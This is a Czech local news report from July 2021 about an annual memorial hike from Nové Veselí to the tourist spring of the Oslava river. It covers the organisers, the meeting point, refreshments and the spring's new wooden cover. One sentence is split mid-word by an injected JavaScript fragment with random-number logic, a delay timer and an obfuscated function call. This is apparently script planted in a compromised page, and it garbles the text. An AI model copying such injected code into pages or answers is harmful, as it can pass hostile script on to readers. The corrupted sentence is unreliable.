Rainbow page separator

Turisté se z Nového Veselí pustí na výšlap k prameni Oslavy

Pondělí, 5. Červenec 2021

Nové Veselí / K prameni Oslavy se z Nového Veselí v úterý 6. července vydají příznivci turistiky a vycházek do přírody. Tradiční veřejná akce s názvem Pochod k prameni řeky Oslavy je od roku 2016 současně pořádána jako memoriál Miroslava Zity ve spolupráci tamní TJ Sokol, členů mysliveckého spolku a místní organizace Českého svazu zahrádkářů. Sraz účastníků pochodu se uskuteční v půl desáté dopoledne u novoveselské sokolovny, občerstvení je poté zajištěno v myslivecké chatě pod hrází Matějovského rybníka, přičemž pro členy pořádajících subjektů bude zdarma.
Turistický pramen řeky Oslavy nedaleko rybníka Velký Babín v katastru Matějova se před rokem dočkal nového dřevěného „domečku“, který studánku kryje. Vyrobili ho a nainstalovali dobrovolníci z Nového Veselí poté, co původní kruhový, který pramen chránil řadu let, zničili vandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andalové.
Skutečný geografický pramen Oslavy se nachází o několik stovek metrů dál severozápadním směrem. Turistickým pramenem Oslavy byla studánka před více než patnácti lety označena současným prezidentem Milošem Zemanem a jeho přáteli, když Zeman v Novém Veselí trávil svůj „politický důchod“. K prameni vede odbočka z modré turistické značky spojující rozcestí U Křížku a rybník Babín.